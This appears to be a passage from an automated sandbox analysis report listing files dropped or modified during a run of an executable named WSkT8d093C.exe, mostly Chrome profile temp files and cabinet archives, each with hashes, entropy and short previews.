Preview:	...................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....e8.@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...1.0.2.\.p.s.m.a.c.h.i.n.e._.6.4...d.l.l..p..+S.`0...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.g.o.o.g.l.e.\.u.p.d.a.t.e.\.1...3...3.6...1.0.2.\.....p.s.m.a.c.h.i.n.e._.6.4...d.l.l.....G.o.o.g.l.e. .U.p.d.a.t.e.......G.o.o.g.l.e. .U.p.d.a.t.e.......1...3...3.6...1.0.2.....@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Variations

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQp:YQ3Kq9X0dMgAEiLIj
MD5:	8549C255650427D618EF18B14DFD2B56
SHA1:	8272585186777B344DB3960DF62B00F570D247F6
SHA-256:	40395D9CA4B65D48DEAC792844A77D4F8051F1CEF30DF561DACFEEED3C3BAE13
SHA-512:	E5BB8A0AD338372635C3629E306604E3DC5A5C26FB5547A3DD7E404E5261630612C07326E7EBF5B47ABAFADE8E555965A1A59A1EECFC496DCDD5003048898A8C
Malicious:	false
Reputation:	unknown
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Google\Chrome\User Data\a02f458c-f808-4cbc-8554-4840d6344fec.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.071022779420665
Encrypted:	false
SSDEEP:	1536:CJ71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:k711NyBTOgd0HhmAnhqj3L
MD5:	E67609D49DFDB61B35E99D1A8E27F90D
SHA1:	31F5E018416CB564839B91221013B3712DEED4AC
SHA-256:	500F7621D9D14146B8711D984E36E8F8AD8A54D1442F9E734224328CC87E2742
SHA-512:	78B164EE85FE4572D2D8199EB46E7D958649FDCD9F6C8B4AFE44D07D30E42A758C826AF1BECD8D9A4AF5A824253A6DE7C1DF182F4C1086DF65B6E53E84794BA0
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\a992605c-02b1-4f7d-86bd-702e25c2b6ec.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071022779420665
Encrypted:	false
SSDEEP:	1536:CJ71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:k711NyBTOgd0HhmAnhqj3L
MD5:	E67609D49DFDB61B35E99D1A8E27F90D
SHA1:	31F5E018416CB564839B91221013B3712DEED4AC
SHA-256:	500F7621D9D14146B8711D984E36E8F8AD8A54D1442F9E734224328CC87E2742
SHA-512:	78B164EE85FE4572D2D8199EB46E7D958649FDCD9F6C8B4AFE44D07D30E42A758C826AF1BECD8D9A4AF5A824253A6DE7C1DF182F4C1086DF65B6E53E84794BA0
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\ad8e9aea-fec4-45d4-aa3b-12249e8279cc.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	109716
Entropy (8bit):	3.74749647252685
Encrypted:	false
SSDEEP:	384:XaqgPM2OPn7o0tr6d6mtFKcVEK8nNArpv8o3jAWXHi/GbK6rlaAAkayxZpernDza:XJ2OYKy1ZaChLEegAcuVrnuUKi0say
MD5:	9EB7E7EC0CF16D693568F137B68124EF
SHA1:	5391868976C924D5BE0B1123F5EDFAB2064A2C02
SHA-256:	18934EEC30BA3931071F4687332759CC15D795FCA67BE3DEE489F9EF795EB07F
SHA-512:	13981F6C912BC0A9FAB124F6CCA8D8BB87DD08FF1A10D7DFCA6C7EBB56EADA275147737CE203117E7D658EF076CED870B66A9FC65CB7AD70D9B803B3ED0787C4
Malicious:	false
Reputation:	unknown
Preview:	...................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....e8.@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...1.0.2.\.p.s.m.a.c.h.i.n.e._.6.4...d.l.l..p..+S.`0...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.g.o.o.g.l.e.\.u.p.d.a.t.e.\.1...3...3.6...1.0.2.\.....p.s.m.a.c.h.i.n.e._.6.4...d.l.l.....G.o.o.g.l.e. .U.p.d.a.t.e.......G.o.o.g.l.e. .U.p.d.a.t.e.......1...3...3.6...1.0.2.....@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...

C:\Users\user\AppData\Local\Google\Chrome\User Data\afe040af-f11f-4b25-9046-aa51b03c1f5c.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	118719
Entropy (8bit):	6.0504907184736805
Encrypted:	false
SSDEEP:	3072:gatS55TnNtTFS788k8oZE711NyBTOgd0HhmAnhqj3o:EHD3FS7V2QXNyTOpBmAh4o
MD5:	965C2E1EE184156F706B5B4761F6F4E4
SHA1:	FECD5CBA05593ABC6CEDA017F68FABCFBE084861
SHA-256:	DCA26AD582DF3631F2241A623A0A75FFFCDF2C7BEB8B0E0E4D68E0EA7F41F578
SHA-512:	3F2E0C317C685FA131085F3785088389776C81F5A1FCF4DC4DA570520EB2AFDAF38D925FB5B23784B18D649FB80C810C8EFADC908F7212101F5F2674CD618977
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661251353674376e+12,"network":1.661218954e+12,"ticks":142651969.0,"uncertainty":2950572.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\bcc6896b-fd00-44be-8aa6-e2a7794428c8.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071023394493198
Encrypted:	false
SSDEEP:	1536:cX71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:o711NyBTOgd0HhmAnhqj3L
MD5:	A5D3EEB844DF6AAC6316AB23551F253C
SHA1:	B7ECC8CA2F3B650F812A8DE6449246E3DC7B4158
SHA-256:	473C3C1529EDD9195DD9FF6DF52D8EB4E04C01B0DBEB567A5E69DD5D81366149
SHA-512:	9E70475E38DF439220EE14E8332E33E67B88C2D4B47099DCAF810CC818A2CB135ACF610E54A20B28246D362C79F973C26791920A2A20426EC75BB95D111ABB75
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\bf72c9aa-1b4b-4c3d-b70d-54b4a6ec3570.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	99914B932BD37A50B983C5E7C90AE93B
SHA1:	BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
SHA-256:	44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
SHA-512:	27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
Malicious:	false
Reputation:	unknown
Preview:	{}

C:\Users\user\AppData\Local\Google\Chrome\User Data\d94697b8-adaa-44a4-84e6-83f559fc9f11.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071022531160042
Encrypted:	false
SSDEEP:	1536:Nt71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:r711NyBTOgd0HhmAnhqj3L
MD5:	73448EDA5577EF9059D32DA6DBF0B86F
SHA1:	786855BADECFD52A72772E9008578401DF8B9761
SHA-256:	AB8D59E596FA4C6B03862EB822B67AFC461E5FDD13926E8C4A95DE6FA4EFEED3
SHA-512:	5C4BDFBDEF28E8FC71E832966266B99ED9BAB3F1F25EAFA80B04ABC9F75E8283E95B8EEEE55A73AB9EE0A641456FD21ACD90518FAB684C58107F73A403149972
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\e73febec-275c-491f-923d-a23620df24a6.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071028594730305
Encrypted:	false
SSDEEP:	1536:cy71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:x711NyBTOgd0HhmAnhqj3L
MD5:	48478039CD1838DC688811B5FF3F13D8
SHA1:	7A38207C6FA7C10F9DC7E6148849546F02FCECB6
SHA-256:	107EBB6C45C1A1745AA989C6C4AADE911AE5247DF229B83CBB1F8A6DED75F855
SHA-512:	D32CC778F60DC693EE9A99B2EF5E0A388067064A13F17B4A904A63814D1D4DFF4AC60BC528D0FEF7DA2F6B0A3A162201160369599291CAEC0F0B2C457FED2813
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\f47c9f74-0ba9-47e6-a526-fc6178391ff8.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.071023394493198
Encrypted:	false
SSDEEP:	1536:cX71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:o711NyBTOgd0HhmAnhqj3L
MD5:	A5D3EEB844DF6AAC6316AB23551F253C
SHA1:	B7ECC8CA2F3B650F812A8DE6449246E3DC7B4158
SHA-256:	473C3C1529EDD9195DD9FF6DF52D8EB4E04C01B0DBEB567A5E69DD5D81366149
SHA-512:	9E70475E38DF439220EE14E8332E33E67B88C2D4B47099DCAF810CC818A2CB135ACF610E54A20B28246D362C79F973C26791920A2A20426EC75BB95D111ABB75
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\fd00d503-30b6-4e0c-b1bf-f8843fb485a8.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.071022747873289
Encrypted:	false
SSDEEP:	1536:Nd71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:v711NyBTOgd0HhmAnhqj3L
MD5:	D0F076E819093D84EEDA870FDA791C2E
SHA1:	EB3C9F7621AC7DB7CBB570B7DA4EF74EC04EC722
SHA-256:	AAAEC44DF50F372CC7C2C79C9C540D6C630C6BF3EAFD89E6D1AE332D7808D6EA
SHA-512:	21FA990BD3A9C7E19855C967B1D8917539614BCF2173BBDC9407C84F2E150AF1150FEC7E0C4E41FE3E9E3BDD5155C228645D72FA72021C80EA8D42A8250B27B4
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	99914B932BD37A50B983C5E7C90AE93B
SHA1:	BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
SHA-256:	44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
SHA-512:	27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
Malicious:	false
Reputation:	unknown
Preview:	{}

C:\Users\user\AppData\Local\Temp\$inst\2.tmp

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	Microsoft Cabinet archive data, 36 bytes
Category:	dropped
Size (bytes):	36
Entropy (8bit):	1.3753156176197312
Encrypted:	false
SSDEEP:	3:wDl:wDl
MD5:	8708699D2C73BED30A0A08D80F96D6D7
SHA1:	684CB9D317146553E8C5269C8AFB1539565F4F78
SHA-256:	A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
SHA-512:	38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
Malicious:	false
Reputation:	unknown
Preview:	MSCF....$.......$...................

C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	Microsoft Cabinet archive data, 2584461 bytes, 11 files
Category:	dropped
Size (bytes):	2584461
Entropy (8bit):	7.9911989016576666
Encrypted:	true
SSDEEP:	49152:6NpJc7YrEa2u2hq3PGh0p4EyqaeFEqLh09fqNZesF+AxnMtQSOanDj:Uc8rHJ283PGi4EyduRLh0MNZesF+AgHj
MD5:	F02424BFA8B1CEBD91C668FB1A55D730
SHA1:	26B92FBF7BA787F3E02116FA1718B5D535B8D6C7
SHA-256:	24C850AAEF4A27FA3DC735476ACEB61814073013AA0FBAAAE4BB976065E3AC5E
SHA-512:	BF2A1D2BD86923483D2357B21E09340C046E5CA7135FF0ADE17D3F82F0EC9723730AC03852ADCEDF81D105EC311DDE3ABEDE9A66BB26473305B15BCA4269D585
Malicious:	false
Reputation:	unknown
Preview:	MSCF.....o'.....,............................L.........U.Z .0......L.....U.> .1...... .....U.. .2..L.........U.. .3............U.. .4............U.W .5..n.........U.. .6.......!....U.. .7.......,....U.@ .8.......G....U.W .9..l...ZI....U.. .10.ce.^!..[.... .8q..@2.E#.`...o.rY.t....gW{..L8..vw...n.;.ro.....{.....{..`.V...0.#..I...&..cY.h.1J..V...FH.H#....u..2S.$.........>t.....:WI...,...[.....<j...W...."q.e..w.3..07.:....b......[.p.e....K...=I...........F........{..~.f.[...X.......,.].L0 Q.......G.\|C.......L6o....U.....X.C.$of.......l..T.?..\@..gt.!:.h....3..;....&3..e.j.^....y6.^....T.=...../.....l....p....D..t..f.l...=1...TV.p.@j.Jo'...K......."[..w.....^.?.[....[o..t........a....-~....F..C...'........g1.6h....?.....x.... ....,...(...c.O..#K..q...:H.V.(.B qj.M.\|......{.c_.{......G......g..>....X...@z.p......M.......H;.....8..8p{.{.l6.1..............,?p.`l0.....x..........~$......'p..x.W.............j.p.X.&....m.H.Aj.......P..=.=..]...\|.``..7.

C:\Users\user\AppData\Local\Temp\1cd493b3-f943-4829-80df-ad6cdbba0e6d.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Category:	dropped
Size (bytes):	3112
Entropy (8bit):	7.939241749332395
Encrypted:	false
SSDEEP:	96:wKpzsMIEd544qmUtUxg2GaAve/VkCvy/JtK:xptFd5dqmUtUxrgGYnK
MD5:	8CDA3FFA8BBC32485EDC42E13716ACE6
SHA1:	422303FEA67454E1D873AF39C3D3773468AC8660
SHA-256:	818B7BC5BFA41FFCD7233D78ECDDF779B77E4868EF2B9485312001CAD6C63361
SHA-512:	B397F2A9146FCB109F37F499F828AB2C8431DFD125873D318A90DA809126F45A1012D75DC86DA506E0D09A5226AC4ECB8B768CCB47198FF29AD0AFAC8C33FB39
Malicious:	false
Reputation:	unknown
Preview:	............ko.7......J...&9....GN........Wj...^.[.kE...........N0`......."...DTkY......O...#....^..Z/.T)9-Kb...L1y......\+F..E.......D.....[&9..tM(yqu.H.u.HYd...^PM2..!...yN...>..\|{.....GG...RYs]....0....a.Z.4._.J3..hV.L.....\|..rL..9...%S.....;...$.W...5 2)....s.OH..&.......32..&....$.y.p.d...I&b..2.Q$......t..4.'X.Bm....w.95y`.._...mV.$B.......q.H......<DT.v..9...Z.^.....o.v.k.I.x.[....X.(.....kC(....!...;;.9..aC.[.R...)}.g.m......}Ds.tJ..Rr>#.N...R.1..jg.......a;....L.%Ee........;......Y`.......V....h..aK.....2z4.<j&.L(.B...j....Q.-@...L>#..........V...7........E..q@h...Rd..y..f....g.............b....E.DWw....&...~V...eh@..'..{.n.V<.1<o...Zz..*...pP.I.s.j..x..0..6...5;..Q.\)...<UL.a..T.pY....&:.h...X\....kK.B..T3O...s.X..il.6&.%..R.u9.(....'n..4.._.{..B.Cyc....W..Y.m'.w..Q`. 1......b...I.....!.o`..rc...?WZH......G......B.{7..Gw .S._wU............4...r.B.....hY...$..SH..'.......`1E.....d4_.0.....C...6..g.A...V.9.o)Q..Y!.-0y...1..H.

C:\Users\user\AppData\Local\Temp\4872_162518063\_platform_specific\x86_64\pnacl_public_pnacl_json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	507
Entropy (8bit):	4.68252584617246
Encrypted:	false
SSDEEP:	12:TjLJ7qaVgPPd8bdzQBXefosmc5T9+n6e1Cetm1JXcAwA:TJ7jViPOd8wfHmZ6RP15
MD5:	35D5F285F255682477F4C50E93299146
SHA1:	FB58813C4D785412F05962CD379434669DE79C2B
SHA-256:	5424C7B084EC4C8BA0A9C69683E5EE88C325BA28564112CC941CD22E392D8433
